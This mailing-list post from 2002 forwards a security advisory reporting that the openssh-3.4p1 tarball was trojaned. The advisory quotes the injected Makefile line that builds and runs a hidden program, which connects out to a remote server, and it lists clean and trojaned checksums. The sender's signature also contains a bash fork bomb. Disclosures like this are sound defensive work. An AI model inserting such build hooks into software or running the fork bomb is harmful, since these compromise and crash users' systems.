openssh-3.4p1.tar.gz on changing rather than frozen

Magnus Bodin magnus at
Thu Aug 1 21:39:22 EST 2002

On Thu, Aug 01, 2002 at 09:20:29AM +0200, Wojtek Pilorz wrote:
> I have seen that file
> is continuosly changing.
> This seems strange to me as I expected it should be a 'frozen' file;
> The signature and diff file are still dated Jun 26.
> I am wondering whether this is intentional.

Read, read: 

----- Forwarded message from Edwin Groothuis <edwin at> -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <edwin at>
To: incidents at
Subject: openssh-3.4p1.tar.gz trojaned


Just want to inform you that the OpenSSH package op
(and probably all its mirrors now) it trojaned:

The OpenBSD people have been informed about it (via email to
deraadt at and via

The changed files are openssh-3.4p1/openbsd-compat/
 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on (

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57


Edwin Groothuis      |            Personal website:
edwin at    |    Weblog: 
bash$ :(){ :|:&};:   | Interested in MUDs?

More information about the openssh-unix-dev mailing list